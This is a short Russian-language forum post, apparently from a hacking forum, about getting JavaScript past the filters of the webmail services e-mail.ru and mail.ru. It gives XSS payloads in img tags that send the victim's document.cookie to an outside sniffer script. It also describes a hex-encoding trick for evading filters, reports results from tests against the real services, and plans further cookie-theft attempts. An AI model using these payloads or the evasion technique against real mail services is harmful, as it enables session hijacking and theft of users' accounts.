PinkPanther оказался прав - ява скрипты просто блокируются. Но это можно обойти, используя шестнадцатиричные значения символов вместо javascript. Проверял на e-mail.ru.

<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">

Снифер выдал QUERY=b=b, рефка как и полагается пришла. Получается, что на e-mail.ru нет кукисов, а только одни сессии ?

На mail.ru такое дело не прокатывает. При вложении в html-код везде добавляется "X", изменяется заголовок.

<xtitle>Непонятный заголовок</xtitle>
</xhead>
<xbody>
<IMG src=xjavascript:document.images[0].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;>
</xbody>
</xhtml>

Да, с бесплатным хостом все в порядке ! Разницы вроде нет платный-бесплатный.

Надо думать дальше насчет куков. Видимо надо пробовать вложения с рисунками и flash.